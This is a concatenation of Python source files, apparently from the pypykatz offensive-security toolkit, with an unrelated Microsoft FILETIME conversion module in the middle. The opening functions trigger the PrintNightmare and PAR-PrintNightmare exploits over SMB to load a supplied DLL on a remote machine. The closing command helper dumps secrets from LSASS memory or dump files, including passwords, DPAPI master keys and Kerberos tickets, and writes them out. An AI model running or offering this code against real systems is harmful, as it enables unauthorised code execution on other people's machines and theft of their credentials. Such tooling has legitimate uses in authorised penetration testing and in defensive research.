            logger.debug('[PRINTNIGHTMARE] Connecting to server...')
            _, err = await connection.login()
            if err is not None:
                raise err
            
            machine = SMBMachine(connection)
            logger.debug('[PRINTNIGHTMARE] Connected!')
            logger.debug('[PRINTNIGHTMARE] Triggering printnightmare...')
            _, err = await machine.printnightmare(dll_path, driverpath)
            if err is not None:
                raise err
            logger.debug('[PRINTNIGHTMARE] Printnightmare finished OK!')
            return True, None
    except Exception as e:
        import traceback
        traceback.print_exc()
        return None, e

async def parprintnightmare(url, dll_path, driverpath = None):
    try:
        from aiosmb.commons.connection.factory import SMBConnectionFactory
        from aiosmb.commons.interfaces.machine import SMBMachine
        
        smburl = SMBConnectionFactory.from_url(url)
        connection = smburl.get_connection()

        async with connection:
            logger.debug('[PARPRINTNIGHTMARE] Connecting to server...')
            _, err = await connection.login()
            if err is not None:
                raise err
            
            machine = SMBMachine(connection)
            logger.debug('[PARPRINTNIGHTMARE] Connected!')
            logger.debug('[PARPRINTNIGHTMARE] Triggering parprintnightmare...')
            _, err = await machine.par_printnightmare(dll_path, driverpath)
            if err is not None:
                raise err
            logger.debug('[PARPRINTNIGHTMARE] Parprintnightmare finished OK!')
            return True, None
    except Exception as e:
        import traceback
        traceback.print_exc()
        return None, e


from ctypes import WinError, c_int, cast, c_int64, sizeof, windll, byref, Structure, c_ubyte, c_int16, c_int32, c_void_p, c_uint16, c_uint32, POINTER, c_longlong

BYTE        = c_ubyte
UCHAR       = BYTE
SHORT       = c_int16
USHORT      = c_uint16
LONG        = c_int32
LPVOID      = c_void_p
PVOID       = LPVOID
PPVOID      = POINTER(PVOID)
DWORD       = c_uint32
HANDLE      = LPVOID
PHANDLE     = POINTER(HANDLE)
LPHANDLE    = PHANDLE
NTSTATUS    = LONG
PNTSTATUS   = POINTER(NTSTATUS)
USHORT      = c_uint16
ULONG       = c_uint32
PULONG      = POINTER(ULONG)
LONGLONG    = c_int64

LPDWORD     = POINTER(DWORD)
LPULONG     = POINTER(ULONG)
LPLONG      = POINTER(LONG)
PDWORD      = LPDWORD

LARGE_INTEGER = c_longlong
PLARGE_INTEGER = POINTER(LARGE_INTEGER)

TOKEN_INFORMATION_CLASS = c_int

ERROR_INSUFFICIENT_BUFFER           = 122

# Standard access rights
DELETE                           = 0x00010000
READ_CONTROL                     = 0x00020000
WRITE_DAC                        = 0x00040000
WRITE_OWNER                      = 0x00080000
SYNCHRONIZE                      = 0x00100000
STANDARD_RIGHTS_REQUIRED         = 0x000F0000
STANDARD_RIGHTS_READ             = READ_CONTROL
STANDARD_RIGHTS_WRITE            = READ_CONTROL
STANDARD_RIGHTS_EXECUTE          = READ_CONTROL
STANDARD_RIGHTS_ALL              = 0x001F0000
SPECIFIC_RIGHTS_ALL              = 0x0000FFFF

# Token access rights
TOKEN_ASSIGN_PRIMARY	= 0x0001
TOKEN_DUPLICATE		 = 0x0002
TOKEN_IMPERSONATE	   = 0x0004
TOKEN_QUERY			 = 0x0008
TOKEN_QUERY_SOURCE	  = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS	 = 0x0040
TOKEN_ADJUST_DEFAULT	= 0x0080
TOKEN_ADJUST_SESSIONID  = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
		TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
		TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
		TOKEN_ADJUST_SESSIONID)

# Invalid handle value is -1 casted to void pointer.
try:
	INVALID_HANDLE_VALUE = c_void_p(-1).value #-1 #0xFFFFFFFF
except TypeError:
	if sizeof(c_void_p) == 4:
		INVALID_HANDLE_VALUE = 0xFFFFFFFF
	elif sizeof(c_void_p) == 8:
		INVALID_HANDLE_VALUE = 0xFFFFFFFFFFFFFFFF
	else:
		raise

SecurityAnonymous	   = 0
SecurityIdentification  = 1
SecurityImpersonation   = 2
SecurityDelegation	  = 3

SECURITY_IMPERSONATION_LEVEL = c_int
PSECURITY_IMPERSONATION_LEVEL = POINTER(SECURITY_IMPERSONATION_LEVEL)

TOKEN_TYPE = c_int
PTOKEN_TYPE = POINTER(TOKEN_TYPE)

class LUID(Structure):
	_fields_ = [
		("LowPart",  DWORD),
		("HighPart", LONG),
	]

	def to_int(self):
		return LUID.luid_to_int(self)

	@staticmethod
	def luid_to_int(luid):
		return (luid.HighPart << 32) + luid.LowPart

	@staticmethod
	def from_int(i):
		luid = LUID()
		luid.HighPart = i >> 32
		luid.LowPart = i & 0xFFFFFFFF
		return luid

PLUID = POINTER(LUID)

class TOKEN_STATISTICS(Structure):
	_fields_ = [
		("TokenId",			   LUID),
		("AuthenticationId",   LUID),
		("ExpirationTime",	   LONGLONG),  # LARGE_INTEGER
		("TokenType",		   TOKEN_TYPE),
		("ImpersonationLevel", SECURITY_IMPERSONATION_LEVEL),
		("DynamicCharged",	   DWORD),
		("DynamicAvailable",   DWORD),
		("GroupCount",		   DWORD),
		("PrivilegeCount",	   DWORD),
		("ModifiedId",		   LUID),
	]
	
	def to_dict(self):
		return {
			"TokenId": self.TokenId.to_int(),
			"AuthenticationId": self.AuthenticationId.to_int(),
			"ExpirationTime": self.ExpirationTime,
			"TokenType": self.TokenType,
			"ImpersonationLevel": self.ImpersonationLevel,
			"DynamicCharged": self.DynamicCharged,
			"DynamicAvailable": self.DynamicAvailable,
			"GroupCount": self.GroupCount,
			"PrivilegeCount": self.PrivilegeCount,
			"ModifiedId": self.ModifiedId.to_int(),
		}
PTOKEN_STATISTICS = POINTER(TOKEN_STATISTICS)

def RaiseIfZero(result, func = None, arguments = ()):
	"""
	Error checking for most Win32 API calls.

	The function is assumed to return an integer, which is C{0} on error.
	In that case the C{WindowsError} exception is raised.
	"""
	if not result:
		raise WinError()
	return result

# BOOL WINAPI OpenProcessToken(
#   __in   HANDLE ProcessHANDLE,
#   __in   DWORD DesiredAccess,
#   __out  PHANDLE TokenHandle
# );
def OpenProcessToken(ProcessHANDLE, DesiredAccess = TOKEN_ALL_ACCESS):
	_OpenProcessToken = windll.advapi32.OpenProcessToken
	_OpenProcessToken.argtypes = [HANDLE, DWORD, PHANDLE]
	_OpenProcessToken.restype  = bool
	_OpenProcessToken.errcheck = RaiseIfZero

	NewTokenHandle = HANDLE(INVALID_HANDLE_VALUE)
	_OpenProcessToken(ProcessHANDLE, DesiredAccess, byref(NewTokenHandle))
	return NewTokenHandle


def GetTokenInformation_tokenstatistics(hTokenHandle):
	"""
	The original function wasn't working. this one returns the SID for the token
	"""
	TokenStatistics						 = 10

	_GetTokenInformation = windll.advapi32.GetTokenInformation
	_GetTokenInformation.argtypes = [HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD]
	_GetTokenInformation.restype  = bool
	_GetTokenInformation.errcheck = RaiseIfZero
	
	ReturnLength = DWORD(0)
	try:
		#getting the correct memory allocation size
		_GetTokenInformation(hTokenHandle, TokenStatistics, None, ReturnLength, byref(ReturnLength))
	except Exception as e:
		pass
		
	TokenInformationLength = ReturnLength.value
	ReturnLength = DWORD(0)
	ti = (BYTE * TokenInformationLength)()
	_GetTokenInformation(hTokenHandle, TokenStatistics, byref(ti), TokenInformationLength, byref(ReturnLength))
	if ReturnLength.value != TokenInformationLength:
		raise WinError(ERROR_INSUFFICIENT_BUFFER)
	
	t = cast(ti, POINTER(TOKEN_STATISTICS)).contents
	res = t.to_dict()

	return res


#!/usr/bin/env python
# Copyright (c) 2009, David Buxton <david@gasmark6.com>
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# 
#	 * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#	 * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tools to convert between Python datetime instances and Microsoft times.
"""
from datetime import datetime, timedelta, tzinfo
from calendar import timegm


# http://support.microsoft.com/kb/167296
# How To Convert a UNIX time_t to a Win32 FILETIME or SYSTEMTIME
EPOCH_AS_FILETIME = 116444736000000000  # January 1, 1970 as MS file time
HUNDREDS_OF_NANOSECONDS = 10000000


ZERO = timedelta(0)
HOUR = timedelta(hours=1)


class UTC(tzinfo):
	"""UTC"""
	def utcoffset(self, dt):
		return ZERO

	def tzname(self, dt):
		return "UTC"

	def dst(self, dt):
		return ZERO


utc = UTC()


def dt_to_filetime(dt):
	"""Converts a datetime to Microsoft filetime format. If the object is
	time zone-naive, it is forced to UTC before conversion.

	>>> "%.0f" % dt_to_filetime(datetime(2009, 7, 25, 23, 0))
	'128930364000000000'

	>>> dt_to_filetime(datetime(1970, 1, 1, 0, 0, tzinfo=utc))
	116444736000000000L

	>>> dt_to_filetime(datetime(1970, 1, 1, 0, 0))
	116444736000000000L
	"""
	if (dt.tzinfo is None) or (dt.tzinfo.utcoffset(dt) is None):
		dt = dt.replace(tzinfo=utc)
	return EPOCH_AS_FILETIME + (timegm(dt.timetuple()) * HUNDREDS_OF_NANOSECONDS)


def filetime_to_dt(ft):
	"""Converts a Microsoft filetime number to a Python datetime. The new
	datetime object is time zone-naive but is equivalent to tzinfo=utc.
	>>> filetime_to_dt(116444736000000000)
	datetime.datetime(1970, 1, 1, 0, 0)

	>>> filetime_to_dt(128930364000000000)
	datetime.datetime(2009, 7, 25, 23, 0)
	"""
	return datetime.fromtimestamp((ft - EPOCH_AS_FILETIME) / HUNDREDS_OF_NANOSECONDS, tz=utc)


if __name__ == "__main__":
	import doctest
	
	doctest.testmod()
	




#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import json
import glob
import ntpath
import traceback
import base64

from pypykatz import logger
from pypykatz.pypykatz import pypykatz
from pypykatz.commons.common import UniversalEncoder
from pypykatz.lsadecryptor.packages.msv.decryptor import LogonSession
from minidump.minidumpfile import MinidumpFile
from pypykatz.commons.common import KatzSystemInfo


class LSACMDHelper:
	def __init__(self):
		self.live_keywords = ['lsa']
		self.keywords = ['lsa']
		
	def add_args(self, parser, live_parser):
		live_group = live_parser.add_parser('lsa', help='Get all secrets from LSASS')
		live_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		live_group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		live_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		live_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		live_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		live_group.add_argument('--method', choices = ['procopen', 'handledup'], default = 'procopen', help = 'LSASS process access method')
		live_group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap', 'kerberos'], nargs="+", default = 'all', help = 'LSASS package to parse')


		group = parser.add_parser('lsa', help='Get secrets from memory dump')
		group.add_argument('cmd', choices=['minidump','rekall','info'])
		group.add_argument('memoryfile', help='path to the dump file')
		group.add_argument('-t','--timestamp_override', type=int, help='enforces msv timestamp override (0=normal, 1=anti_mimikatz)')
		group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		group.add_argument('-r', '--recursive', action='store_true', help = 'Recursive parsing')
		group.add_argument('-d', '--directory', action='store_true', help = 'Parse all dump files in a folder')
		group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap', 'kerberos'], nargs="+", default = 'all', help = 'LSASS package to parse')
		
	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			self.run(args)
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
			
	def process_results(self, results, files_with_error, args):
		if args.outfile and args.json:
			with open(args.outfile, 'w') as f:
				json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)

		elif args.outfile and args.grep:
			with open(args.outfile, 'w', newline = '', errors='replace') as f:
				f.write(':'.join(LogonSession.grep_header) + '\r\n')
				for result in results:
					for luid in results[result].logon_sessions:
						for row in results[result].logon_sessions[luid].to_grep_rows():
							f.write(':'.join(row) + '\r\n')
		
		elif args.outfile:
			with open(args.outfile, 'w', errors='replace') as f:
				for result in results:
					f.write('FILE: ======== %s =======\n' % result)
					
					for luid in results[result].logon_sessions:
						f.write('\n'+str(results[result].logon_sessions[luid]))
					
					if len(results[result].orphaned_creds) > 0:
						f.write('\n== Orphaned credentials ==\n')
						for cred in results[result].orphaned_creds:
							f.write(str(cred))
					
				if len(files_with_error) > 0:
					f.write('\n== Failed to parse these files:\n')
					for filename in files_with_error:
						f.write('%s\n' % filename)
						
		elif args.json:
			print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
		
		elif args.grep:
			if hasattr(args, 'directory') and args.directory is not None:
				print(':'.join(['filename'] + LogonSession.grep_header))
			else:
				print(':'.join(LogonSession.grep_header))
			for result in results:
				for luid in results[result].logon_sessions:
					for row in results[result].logon_sessions[luid].to_grep_rows():
						if hasattr(args, 'directory') and args.directory is not None:
							row = [result] + row
						print(':'.join(row))
				for cred in results[result].orphaned_creds:
					t = cred.to_dict()
					if t['credtype'] == 'cloudap':
						x = [str(t['credtype']), '', '', '', '', '', str(cred.get_masterkey_hex()), str(t['dpapi_key_sha1']), str(t['key_guid']), t['PRT']]
						if hasattr(args, 'directory') and args.directory is not None:
							x = [result] + x
						print(':'.join(x))
					elif t['credtype'] != 'dpapi':
						if t.get('password', None) is not None and t['password'] is not None:
							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
							if hasattr(args, 'directory') and args.directory is not None:
								x = [result] + x
							print(':'.join(x))
					else:
						t = cred.to_dict()
						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
						if hasattr(args, 'directory') and args.directory is not None:
							x = [result] + x
						print(':'.join(x))
				
				for pkg, err in results[result].errors:
					err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
					err_str = base64.b64encode(err_str.encode()).decode()
					x =  [pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str]
					if hasattr(args, 'directory') and args.directory is not None:
						x = [result] + x
					print(':'.join(x) + '\r\n')
		else:
			for result in results:
				print('FILE: ======== %s =======' % result)	
				if isinstance(results[result], str):
					print(results[result])
				else:
					for luid in results[result].logon_sessions:
						print(str(results[result].logon_sessions[luid]))
							
					if len(results[result].orphaned_creds) > 0:
						print('== Orphaned credentials ==')
						for cred in results[result].orphaned_creds:
							print(str(cred))
					
					if len(results[result].errors) > 0:
						print('== Errors ==')
						for pkg, err in results[result].errors:
							err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
							logger.debug(err_str)
							err_str = base64.b64encode(err_str.encode()).decode()
							print('%s %s' % (pkg+'_exception_please_report',err_str))
							
					

			if len(files_with_error) > 0:			
				print('\n==== Parsing errors:')
				for filename in files_with_error:
					print(filename)
		
		
		if args.kerberos_dir:
			dir = os.path.abspath(args.kerberos_dir)
			logger.info('Writing kerberos tickets to %s' % dir)
			for filename in results:
				base_filename = ntpath.basename(filename)
				ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
				results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
				for luid in results[filename].logon_sessions:
					for kcred in results[filename].logon_sessions[luid].kerberos_creds:
						for ticket in kcred.tickets:
							ticket.to_kirbi(dir)
							
				for cred in results[filename].orphaned_creds:
					if cred.credtype == 'kerberos':
						for ticket in cred.tickets:
							ticket.to_kirbi(dir)
		
	def run_live(self, args):
		files_with_error = []
		results = {}
		if args.module == 'lsa':
			filename = 'live'
			try:
				if args.kerberos_dir is not None and 'all' not in args.packages:
					args.packages.append('ktickets')
				if args.method == 'procopen':
					mimi = pypykatz.go_live(packages=args.packages)
				elif args.method == 'handledup':
					mimi = pypykatz.go_handledup(packages=args.packages)
					if mimi is None:
						raise Exception('HANDLEDUP failed to bring any results!')
				results['live'] = mimi
				if args.halt_on_error == True and len(mimi.errors) > 0:
					raise Exception('Error in modules!')
			except Exception as e:
				files_with_error.append(filename)
				if args.halt_on_error == True:
					raise e
				else:
					print('Exception while dumping LSA credentials from memory.')
					traceback.print_exc()
					pass
					
			self.process_results(results, files_with_error,args)
			
	def run(self, args):
		files_with_error = []
		results = {}
		###### Rekall
		if args.cmd == 'rekall':
			if args.kerberos_dir is not None and 'all' not in args.packages:
				args.packages.append('ktickets')
			mimi = pypykatz.parse_memory_dump_rekall(args.memoryfile, args.timestamp_override, packages=args.packages)
			results['rekall'] = mimi
		
		elif args.cmd == 'info':
			if args.directory:
				dir_fullpath = os.path.abspath(args.memoryfile)
				file_pattern = '*.dmp'
				if args.recursive == True:
					globdata = os.path.join(dir_fullpath, '**', file_pattern)
				else:	
					globdata = os.path.join(dir_fullpath, file_pattern)
			else:
				globdata = args.memoryfile
			
			for filename in glob.glob(globdata, recursive=args.recursive):
				minidump = MinidumpFile.parse(filename)
				sysinfo = KatzSystemInfo.from_minidump(minidump)
				print('[%s] %s' % (filename, sysinfo))

	
		###### Minidump
		elif args.cmd == 'minidump':
			if args.directory:
				dir_fullpath = os.path.abspath(args.memoryfile)
				for file_pattern in ['*.dmp', '*.DMP']:
					if args.recursive == True:
						globdata = os.path.join(dir_fullpath, '**', file_pattern)
					else:	
						globdata = os.path.join(dir_fullpath, file_pattern)
						
					logger.info('Parsing folder %s' % dir_fullpath)
					for filename in glob.glob(globdata, recursive=args.recursive):
						logger.info('Parsing file %s' % filename)
						try:
							if args.kerberos_dir is not None and 'all' not in args.packages:
								args.packages.append('ktickets')
							mimi = pypykatz.parse_minidump_file(filename, packages=args.packages)
							results[filename] = mimi
							if args.halt_on_error == True and len(mimi.errors) > 0:
								print(mimi.errors)
								raise Exception('Error in modules!')
						except Exception as e:
							files_with_error.append(filename)
							logger.exception('Error parsing file %s ' % filename)
							if args.halt_on_error == True:
								raise e
							else:
								pass
					
			else:
				logger.info('Parsing file %s' % args.memoryfile)
				try:
					if args.kerberos_dir is not None and 'all' not in args.packages:
						args.packages.append('ktickets')
					mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
					results[args.memoryfile] = mimi
					if args.halt_on_error == True and len(mimi.errors) > 0:
						raise Exception('Error in modules!')
				except Exception as e:
					logger.exception('Error while parsing file %s' % args.memoryfile)
					if args.halt_on_error == True:
						raise e
					else:
						traceback.print_exc()
						
		self.process_results(results, files_with_error, args)